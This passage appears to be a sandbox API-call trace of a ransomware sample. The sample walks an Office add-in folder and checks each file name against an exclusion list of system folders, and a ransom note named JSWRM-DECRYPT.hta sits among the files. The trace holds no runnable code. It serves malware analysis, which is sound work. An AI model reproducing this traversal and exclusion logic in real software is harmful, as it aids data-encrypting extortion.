Flags=0x0, Size=0xa0) returned 0x23d3e0 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.594] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\jswrm-decrypt.hta")) returned 0x20 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0123.594] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf016e209, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4052b29d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232240 [0123.594] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.594] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf016e209, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4052b29d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.594] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.594] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.594] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x520cca6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x520cca6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5612cee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x143040, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="DATATRANSFORMERWRAPPER.DLL", cAlternateFileName="DATATR~1.DLL")) returned 1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2=".") returned 1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="..") returned 1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="...") returned 1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="windows") returned -1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="recovery") returned -1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="perflogs") returned -1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="documents and settings") returned -1 [0123.594] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.595] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="system volume information") returned -1 [0123.595] lstrcmpiW (lpString1="DATATRANSFORMERWRAPPER.DLL", lpString2="msocache") returned -1 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATATRANSFORMERWRAPPER.DLL", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATATRANSFORMERWRAPPER.DLL", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATATRANSFORMERWRAPPER.DLL", lpUsedDefaultChar=0x0) returned 26 [0123.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATATRANSFORMERWRAPPER.DLL", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATATRANSFORMERWRAPPER.DLL", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATATRANSFORMERWRAPPER.DLL", lpUsedDefaultChar=0x0) returned 26 [0123.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0123.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0123.595] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42270, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="EXCELPLUGINCORE.DLL", cAlternateFileName="EXCELP~3.DLL")) returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2=".") returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="..") returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="...") returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="windows") returned -1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="recovery") returned -1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="perflogs") returned -1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="documents and settings") returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="system volume information") returned -1 [0123.595] lstrcmpiW (lpString1="EXCELPLUGINCORE.DLL", lpString2="msocache") returned -1 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINCORE.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINCORE.DLL", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINCORE.DLL", lpUsedDefaultChar=0x0) returned 19 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINCORE.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINCORE.DLL", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINCORE.DLL", lpUsedDefaultChar=0x0) returned 19 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.596] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf016e209, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf016e209, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0194432, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1354e8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="EXCELPLUGINDATAPROVIDER.DLL", cAlternateFileName="EXCELP~1.DLL")) returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2=".") returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="..") returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="...") returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="windows") returned -1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="recovery") returned -1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="perflogs") returned -1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="documents and settings") returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="system volume information") returned -1 [0123.596] lstrcmpiW (lpString1="EXCELPLUGINDATAPROVIDER.DLL", lpString2="msocache") returned -1 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINDATAPROVIDER.DLL", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINDATAPROVIDER.DLL", cchWideChar=27, lpMultiByteStr=0x2411f0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINDATAPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 27 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINDATAPROVIDER.DLL", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINDATAPROVIDER.DLL", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINDATAPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 27 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0123.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0123.597] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cd5a2f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4cfbc75, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b4c0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="EXCELPLUGINSHELL.DLL", cAlternateFileName="EXCELP~2.DLL")) returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2=".") returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="..") returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="...") returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="windows") returned -1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="recovery") returned -1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="perflogs") returned -1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="documents and settings") returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="system volume information") returned -1 [0123.597] lstrcmpiW (lpString1="EXCELPLUGINSHELL.DLL", lpString2="msocache") returned -1 [0123.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINSHELL.DLL", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINSHELL.DLL", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINSHELL.DLL", lpUsedDefaultChar=0x0) returned 20 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINSHELL.DLL", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCELPLUGINSHELL.DLL", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCELPLUGINSHELL.DLL", lpUsedDefaultChar=0x0) returned 20 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.597] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4052b29d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4052b29d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40552500, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.597] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.597] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.597] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.597] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.598] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0123.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.598] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5e43de4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5e43de4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6164f96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31a898, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2=".") returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="..") returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="...") returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="windows") returned -1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="recovery") returned -1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="perflogs") returned -1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="documents and settings") returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="system volume information") returned -1 [0123.598] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpString2="msocache") returned -1 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpUsedDefaultChar=0x0) returned 45 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL", lpUsedDefaultChar=0x0) returned 45 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.599] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, 